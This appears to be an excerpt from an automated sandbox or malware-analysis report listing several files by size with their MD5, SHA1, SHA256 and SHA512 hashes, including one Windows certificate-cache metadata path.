SHA256a8b86dfbe78e35a75af7173438474a5585343d0539348cd0ff66d1c5d7073fea
SHA512eff8a8bdad4347094b4cfa0b540b52d99ba9c25f3b85867a169314c58b050a6a02bbca0c0bb2d0d1efb68bbd90c0e613ac5bc5a78ff2c175f5db1e2117c8b608
-
C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize340B
MD59ec4bc718ab5b127bc963141ba227347
SHA102aca3b2f60eef60c7e847fc31a48abde452ef1a
SHA256698974d44bfb03562296a0a432bff0a229d992d76c09d68f2cab8a4ad4287d2f
SHA5121ae54c353d252c0a9bf6aacb5771e5f4085e946de9260896288c93ebbaf74e6efd91dbe59736a0f4263b1aa5c29defa1f76e7760c3dc1553a61bdfe2d766e89e
-
Filesize
87KB
MD5b048f3c90ffb82c5514d4645ea909064
SHA13090dd09c42a58b5e4adbb0626ebe94dd4c1e1bb
SHA2562b63e6ea0082dd3dcdcdb53163a35b49c26ea622cadda60060f5e20215f4911b
SHA5125f19016066d2f1117b64b6b820057aab27b61533cadf81a863978ef240bc43b6a080bf1eb8116267510c95e58979382753ac4d9767fc9930899714b51931e3de
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
548KB
MD573c36e7e75e989f8b1e5dd4e9a1b493d
SHA1af5bf582a6d1b424355f8af579b8f202fbe4b834
SHA2562b0fa86f46148d25d365085a021a9b836e34275955ca0446723553bbcf388ac0
SHA5125c95fcfb41ca505ca2a9d7d0f11d4e57831bfabd5e1c741c6bf26b0b2a89e36524cca53e6eff3ad7ccac14c0030ab0fc76581275ee8acfe0304be216a6e6ec44
-
Filesize
124B
MD59166665baf7bb0073950282f9e564f9a
SHA1778c5cabc610cd43a27ffe5d234c83b15c1cf4b4
SHA2561ea16517b85d71981d4c02b1f5ff4919a351f58019ce1fc50110c8d7665ab4ae
SHA51241ca22e2ff7553d321cf6b2acd6330398719c75dbf6ed2f4b2760763ddf632babf12a4cd802f7af92978b3df3bfcaea55a764170cf9792870313e7ce0bc62177